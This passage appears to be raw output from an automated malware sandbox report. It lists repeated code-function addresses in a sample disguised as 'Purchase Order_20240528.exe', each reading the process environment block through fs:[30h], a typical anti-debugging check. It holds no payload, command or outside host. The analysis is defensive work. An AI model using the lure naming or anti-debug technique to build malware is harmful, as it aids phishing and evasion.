        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0160A470 mov eax, dword ptr fs:[00000030h]3_2_0160A470
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0160A470 mov eax, dword ptr fs:[00000030h]3_2_0160A470
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161E443 mov eax, dword ptr fs:[00000030h]3_2_0161E443
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161E443 mov eax, dword ptr fs:[00000030h]3_2_0161E443
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161E443 mov eax, dword ptr fs:[00000030h]3_2_0161E443
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161E443 mov eax, dword ptr fs:[00000030h]3_2_0161E443
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161E443 mov eax, dword ptr fs:[00000030h]3_2_0161E443
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161E443 mov eax, dword ptr fs:[00000030h]3_2_0161E443
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161E443 mov eax, dword ptr fs:[00000030h]3_2_0161E443
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161E443 mov eax, dword ptr fs:[00000030h]3_2_0161E443
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0160245A mov eax, dword ptr fs:[00000030h]3_2_0160245A
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0169A456 mov eax, dword ptr fs:[00000030h]3_2_0169A456
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01666420 mov eax, dword ptr fs:[00000030h]3_2_01666420
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01666420 mov eax, dword ptr fs:[00000030h]3_2_01666420
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01666420 mov eax, dword ptr fs:[00000030h]3_2_01666420
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01666420 mov eax, dword ptr fs:[00000030h]3_2_01666420
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01666420 mov eax, dword ptr fs:[00000030h]3_2_01666420
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01666420 mov eax, dword ptr fs:[00000030h]3_2_01666420
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01666420 mov eax, dword ptr fs:[00000030h]3_2_01666420
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161A430 mov eax, dword ptr fs:[00000030h]3_2_0161A430
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01618402 mov eax, dword ptr fs:[00000030h]3_2_01618402
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01618402 mov eax, dword ptr fs:[00000030h]3_2_01618402
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01618402 mov eax, dword ptr fs:[00000030h]3_2_01618402
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015DC427 mov eax, dword ptr fs:[00000030h]3_2_015DC427
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015DE420 mov eax, dword ptr fs:[00000030h]3_2_015DE420
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015DE420 mov eax, dword ptr fs:[00000030h]3_2_015DE420
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015DE420 mov eax, dword ptr fs:[00000030h]3_2_015DE420
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E04E5 mov ecx, dword ptr fs:[00000030h]3_2_015E04E5
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016144B0 mov ecx, dword ptr fs:[00000030h]3_2_016144B0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0166A4B0 mov eax, dword ptr fs:[00000030h]3_2_0166A4B0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0169A49A mov eax, dword ptr fs:[00000030h]3_2_0169A49A
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E64AB mov eax, dword ptr fs:[00000030h]3_2_015E64AB
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E0750 mov eax, dword ptr fs:[00000030h]3_2_015E0750
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161674D mov esi, dword ptr fs:[00000030h]3_2_0161674D
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161674D mov eax, dword ptr fs:[00000030h]3_2_0161674D
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161674D mov eax, dword ptr fs:[00000030h]3_2_0161674D
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E8770 mov eax, dword ptr fs:[00000030h]3_2_015E8770
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F0770 mov eax, dword ptr fs:[00000030h]3_2_015F0770
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F0770 mov eax, dword ptr fs:[00000030h]3_2_015F0770
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F0770 mov eax, dword ptr fs:[00000030h]3_2_015F0770
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F0770 mov eax, dword ptr fs:[00000030h]3_2_015F0770
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F0770 mov eax, dword ptr fs:[00000030h]3_2_015F0770
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F0770 mov eax, dword ptr fs:[00000030h]3_2_015F0770
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F0770 mov eax, dword ptr fs:[00000030h]3_2_015F0770
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F0770 mov eax, dword ptr fs:[00000030h]3_2_015F0770
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F0770 mov eax, dword ptr fs:[00000030h]3_2_015F0770
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F0770 mov eax, dword ptr fs:[00000030h]3_2_015F0770
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F0770 mov eax, dword ptr fs:[00000030h]3_2_015F0770
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F0770 mov eax, dword ptr fs:[00000030h]3_2_015F0770
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01622750 mov eax, dword ptr fs:[00000030h]3_2_01622750
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01622750 mov eax, dword ptr fs:[00000030h]3_2_01622750
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01664755 mov eax, dword ptr fs:[00000030h]3_2_01664755
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0166E75D mov eax, dword ptr fs:[00000030h]3_2_0166E75D
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161C720 mov eax, dword ptr fs:[00000030h]3_2_0161C720
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161C720 mov eax, dword ptr fs:[00000030h]3_2_0161C720
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E0710 mov eax, dword ptr fs:[00000030h]3_2_015E0710
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0165C730 mov eax, dword ptr fs:[00000030h]3_2_0165C730
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161273C mov eax, dword ptr fs:[00000030h]3_2_0161273C
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161273C mov ecx, dword ptr fs:[00000030h]3_2_0161273C
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161273C mov eax, dword ptr fs:[00000030h]3_2_0161273C
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161C700 mov eax, dword ptr fs:[00000030h]3_2_0161C700
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01610710 mov eax, dword ptr fs:[00000030h]3_2_01610710
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0166E7E1 mov eax, dword ptr fs:[00000030h]3_2_0166E7E1
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016027ED mov eax, dword ptr fs:[00000030h]3_2_016027ED
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016027ED mov eax, dword ptr fs:[00000030h]3_2_016027ED
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016027ED mov eax, dword ptr fs:[00000030h]3_2_016027ED
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015EC7C0 mov eax, dword ptr fs:[00000030h]3_2_015EC7C0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E47FB mov eax, dword ptr fs:[00000030h]3_2_015E47FB
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E47FB mov eax, dword ptr fs:[00000030h]3_2_015E47FB
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016607C3 mov eax, dword ptr fs:[00000030h]3_2_016607C3
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016947A0 mov eax, dword ptr fs:[00000030h]3_2_016947A0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0168678E mov eax, dword ptr fs:[00000030h]3_2_0168678E
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E07AF mov eax, dword ptr fs:[00000030h]3_2_015E07AF
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161A660 mov eax, dword ptr fs:[00000030h]3_2_0161A660
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161A660 mov eax, dword ptr fs:[00000030h]3_2_0161A660
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016A866E mov eax, dword ptr fs:[00000030h]3_2_016A866E
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016A866E mov eax, dword ptr fs:[00000030h]3_2_016A866E
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01612674 mov eax, dword ptr fs:[00000030h]3_2_01612674
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015FC640 mov eax, dword ptr fs:[00000030h]3_2_015FC640
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01616620 mov eax, dword ptr fs:[00000030h]3_2_01616620
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01618620 mov eax, dword ptr fs:[00000030h]3_2_01618620
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F260B mov eax, dword ptr fs:[00000030h]3_2_015F260B
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F260B mov eax, dword ptr fs:[00000030h]3_2_015F260B
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F260B mov eax, dword ptr fs:[00000030h]3_2_015F260B
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F260B mov eax, dword ptr fs:[00000030h]3_2_015F260B
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F260B mov eax, dword ptr fs:[00000030h]3_2_015F260B
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F260B mov eax, dword ptr fs:[00000030h]3_2_015F260B
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F260B mov eax, dword ptr fs:[00000030h]3_2_015F260B
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0165E609 mov eax, dword ptr fs:[00000030h]3_2_0165E609
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E262C mov eax, dword ptr fs:[00000030h]3_2_015E262C
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015FE627 mov eax, dword ptr fs:[00000030h]3_2_015FE627
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01622619 mov eax, dword ptr fs:[00000030h]3_2_01622619
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0165E6F2 mov eax, dword ptr fs:[00000030h]3_2_0165E6F2
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0165E6F2 mov eax, dword ptr fs:[00000030h]3_2_0165E6F2
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0165E6F2 mov eax, dword ptr fs:[00000030h]3_2_0165E6F2
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0165E6F2 mov eax, dword ptr fs:[00000030h]3_2_0165E6F2
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016606F1 mov eax, dword ptr fs:[00000030h]3_2_016606F1
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016606F1 mov eax, dword ptr fs:[00000030h]3_2_016606F1
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161A6C7 mov ebx, dword ptr fs:[00000030h]3_2_0161A6C7
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161A6C7 mov eax, dword ptr fs:[00000030h]3_2_0161A6C7
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161C6A6 mov eax, dword ptr fs:[00000030h]3_2_0161C6A6
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E4690 mov eax, dword ptr fs:[00000030h]3_2_015E4690
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E4690 mov eax, dword ptr fs:[00000030h]3_2_015E4690
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016166B0 mov eax, dword ptr fs:[00000030h]3_2_016166B0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01606962 mov eax, dword ptr fs:[00000030h]3_2_01606962
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01606962 mov eax, dword ptr fs:[00000030h]3_2_01606962
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01606962 mov eax, dword ptr fs:[00000030h]3_2_01606962
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0162096E mov eax, dword ptr fs:[00000030h]3_2_0162096E
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0162096E mov edx, dword ptr fs:[00000030h]3_2_0162096E
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0162096E mov eax, dword ptr fs:[00000030h]3_2_0162096E
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01684978 mov eax, dword ptr fs:[00000030h]3_2_01684978
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01684978 mov eax, dword ptr fs:[00000030h]3_2_01684978
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0166C97C mov eax, dword ptr fs:[00000030h]3_2_0166C97C
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01660946 mov eax, dword ptr fs:[00000030h]3_2_01660946
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016B4940 mov eax, dword ptr fs:[00000030h]3_2_016B4940
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015D8918 mov eax, dword ptr fs:[00000030h]3_2_015D8918
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015D8918 mov eax, dword ptr fs:[00000030h]3_2_015D8918
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0166892A mov eax, dword ptr fs:[00000030h]3_2_0166892A
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0167892B mov eax, dword ptr fs:[00000030h]3_2_0167892B
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0165E908 mov eax, dword ptr fs:[00000030h]3_2_0165E908
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0165E908 mov eax, dword ptr fs:[00000030h]3_2_0165E908
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0166C912 mov eax, dword ptr fs:[00000030h]3_2_0166C912
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0166E9E0 mov eax, dword ptr fs:[00000030h]3_2_0166E9E0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015EA9D0 mov eax, dword ptr fs:[00000030h]3_2_015EA9D0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015EA9D0 mov eax, dword ptr fs:[00000030h]3_2_015EA9D0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015EA9D0 mov eax, dword ptr fs:[00000030h]3_2_015EA9D0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015EA9D0 mov eax, dword ptr fs:[00000030h]3_2_015EA9D0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015EA9D0 mov eax, dword ptr fs:[00000030h]3_2_015EA9D0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015EA9D0 mov eax, dword ptr fs:[00000030h]3_2_015EA9D0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016129F9 mov eax, dword ptr fs:[00000030h]3_2_016129F9
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016129F9 mov eax, dword ptr fs:[00000030h]3_2_016129F9
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016769C0 mov eax, dword ptr fs:[00000030h]3_2_016769C0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016149D0 mov eax, dword ptr fs:[00000030h]3_2_016149D0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016AA9D3 mov eax, dword ptr fs:[00000030h]3_2_016AA9D3
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016689B3 mov esi, dword ptr fs:[00000030h]3_2_016689B3
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016689B3 mov eax, dword ptr fs:[00000030h]3_2_016689B3
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016689B3 mov eax, dword ptr fs:[00000030h]3_2_016689B3
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E09AD mov eax, dword ptr fs:[00000030h]3_2_015E09AD
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E09AD mov eax, dword ptr fs:[00000030h]3_2_015E09AD
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F29A0 mov eax, dword ptr fs:[00000030h]3_2_015F29A0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F29A0 mov eax, dword ptr fs:[00000030h]3_2_015F29A0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F29A0 mov eax, dword ptr fs:[00000030h]3_2_015F29A0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F29A0 mov eax, dword ptr fs:[00000030h]3_2_015F29A0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F29A0 mov eax, dword ptr fs:[00000030h]3_2_015F29A0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F29A0 mov eax, dword ptr fs:[00000030h]3_2_015F29A0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F29A0 mov eax, dword ptr fs:[00000030h]3_2_015F29A0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F29A0 mov eax, dword ptr fs:[00000030h]3_2_015F29A0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F29A0 mov eax, dword ptr fs:[00000030h]3_2_015F29A0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F29A0 mov eax, dword ptr fs:[00000030h]3_2_015F29A0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F29A0 mov eax, dword ptr fs:[00000030h]3_2_015F29A0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F29A0 mov eax, dword ptr fs:[00000030h]3_2_015F29A0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F29A0 mov eax, dword ptr fs:[00000030h]3_2_015F29A0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E4859 mov eax, dword ptr fs:[00000030h]3_2_015E4859
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E4859 mov eax, dword ptr fs:[00000030h]3_2_015E4859
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0166E872 mov eax, dword ptr fs:[00000030h]3_2_0166E872
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0166E872 mov eax, dword ptr fs:[00000030h]3_2_0166E872
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01676870 mov eax, dword ptr fs:[00000030h]3_2_01676870
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01676870 mov eax, dword ptr fs:[00000030h]3_2_01676870
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F2840 mov ecx, dword ptr fs:[00000030h]3_2_015F2840
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01610854 mov eax, dword ptr fs:[00000030h]3_2_01610854
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161A830 mov eax, dword ptr fs:[00000030h]3_2_0161A830
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0168483A mov eax, dword ptr fs:[00000030h]3_2_0168483A
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0168483A mov eax, dword ptr fs:[00000030h]3_2_0168483A
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01602835 mov eax, dword ptr fs:[00000030h]3_2_01602835
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01602835 mov eax, dword ptr fs:[00000030h]3_2_01602835
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01602835 mov eax, dword ptr fs:[00000030h]3_2_01602835
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01602835 mov ecx, dword ptr fs:[00000030h]3_2_01602835
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01602835 mov eax, dword ptr fs:[00000030h]3_2_01602835
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01602835 mov eax, dword ptr fs:[00000030h]3_2_01602835
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0166C810 mov eax, dword ptr fs:[00000030h]3_2_0166C810
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016AA8E4 mov eax, dword ptr fs:[00000030h]3_2_016AA8E4
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161C8F9 mov eax, dword ptr fs:[00000030h]3_2_0161C8F9
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161C8F9 mov eax, dword ptr fs:[00000030h]3_2_0161C8F9
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0160E8C0 mov eax, dword ptr fs:[00000030h]3_2_0160E8C0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016B08C0 mov eax, dword ptr fs:[00000030h]3_2_016B08C0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E0887 mov eax, dword ptr fs:[00000030h]3_2_015E0887
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0166C89D mov eax, dword ptr fs:[00000030h]3_2_0166C89D
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015D8B50 mov eax, dword ptr fs:[00000030h]3_2_015D8B50
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01694B4B mov eax, dword ptr fs:[00000030h]3_2_01694B4B
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01694B4B mov eax, dword ptr fs:[00000030h]3_2_01694B4B
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015DCB7E mov eax, dword ptr fs:[00000030h]3_2_015DCB7E
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01676B40 mov eax, dword ptr fs:[00000030h]3_2_01676B40
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01676B40 mov eax, dword ptr fs:[00000030h]3_2_01676B40
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016AAB40 mov eax, dword ptr fs:[00000030h]3_2_016AAB40
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01688B42 mov eax, dword ptr fs:[00000030h]3_2_01688B42
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0168EB50 mov eax, dword ptr fs:[00000030h]3_2_0168EB50
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016B2B57 mov eax, dword ptr fs:[00000030h]3_2_016B2B57
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016B2B57 mov eax, dword ptr fs:[00000030h]3_2_016B2B57
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016B2B57 mov eax, dword ptr fs:[00000030h]3_2_016B2B57
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016B2B57 mov eax, dword ptr fs:[00000030h]3_2_016B2B57
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0160EB20 mov eax, dword ptr fs:[00000030h]3_2_0160EB20
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0160EB20 mov eax, dword ptr fs:[00000030h]3_2_0160EB20
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016A8B28 mov eax, dword ptr fs:[00000030h]3_2_016A8B28
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016A8B28 mov eax, dword ptr fs:[00000030h]3_2_016A8B28
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016B4B00 mov eax, dword ptr fs:[00000030h]3_2_016B4B00
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0165EB1D mov eax, dword ptr fs:[00000030h]3_2_0165EB1D
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0165EB1D mov eax, dword ptr fs:[00000030h]3_2_0165EB1D
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0165EB1D mov eax, dword ptr fs:[00000030h]3_2_0165EB1D
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0165EB1D mov eax, dword ptr fs:[00000030h]3_2_0165EB1D
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0165EB1D mov eax, dword ptr fs:[00000030h]3_2_0165EB1D
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0165EB1D mov eax, dword ptr fs:[00000030h]3_2_0165EB1D
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0165EB1D mov eax, dword ptr fs:[00000030h]3_2_0165EB1D
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0165EB1D mov eax, dword ptr fs:[00000030h]3_2_0165EB1D
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0165EB1D mov eax, dword ptr fs:[00000030h]3_2_0165EB1D
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E0BCD mov eax, dword ptr fs:[00000030h]3_2_015E0BCD
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E0BCD mov eax, dword ptr fs:[00000030h]3_2_015E0BCD
